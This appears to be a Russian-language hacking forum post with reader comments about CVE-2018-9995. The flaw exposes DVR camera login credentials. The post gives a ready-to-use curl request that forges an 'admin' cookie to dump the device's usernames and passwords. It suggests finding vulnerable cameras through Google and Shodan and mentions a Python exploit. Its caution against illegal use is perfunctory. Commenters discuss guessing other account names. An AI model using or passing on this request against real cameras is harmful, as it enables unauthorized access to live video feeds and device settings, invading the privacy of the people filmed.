Статья CVE-2018-9995 или как получить логин и пароль к DVR камере

Приветствую, форумчане. Не так давно была обнаружена

Ссылка скрыта от гостей

, затрагивающая довольно большое количество камер.
Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе.

Собственно запрос

curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Камеры неплохо "гуглятся" и находятся в шодане.

google, shodan

Не советую использовать всё это дело в незаконных целях (я должен был это сказать), по крайней мере потому, что подглядывать не хорошо
На гите автора есть эксплоит на питоне (хотя по мне проще написать свой)

 

[ghost]

Шикарная статья!

 

[Дядюшка Рик]

шикарненькооо

 

[Vander]

Однозначно в закладки)

 

[Сергей Попов]

Правильный комментарий в группе вк

 

[OBLIVIONNN]

Я так понимаю uid это логин, но как тогда узнать uid если он по стандарту не admin ?

 

[prikolsmejaka]

Я так понимаю uid это логин, но как тогда узнать uid если он по стандарту не admin ?

Это будут уже наверняка какие-нибудь операторские или гостевые учетки, обычно у них логины что-то на подобии "user".

 

[Светлана Шмакова]

Куда вставлять этот код ? Если в cmd.exe - выдает

<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>404 Not Found</H4>
File not found.
<HR>
<ADDRESS><A HREF="[URL='http://www.acme.com/software/mini_httpd/']mini_httpd[/URL]">mini_httpd/1.19 19de
c2003</A></ADDRESS>
</BODY>
</HTML>

Если в python - выдает
SyntaxError: invalid syntax

...Program finished with exit code 1

Press ENTER to exit console.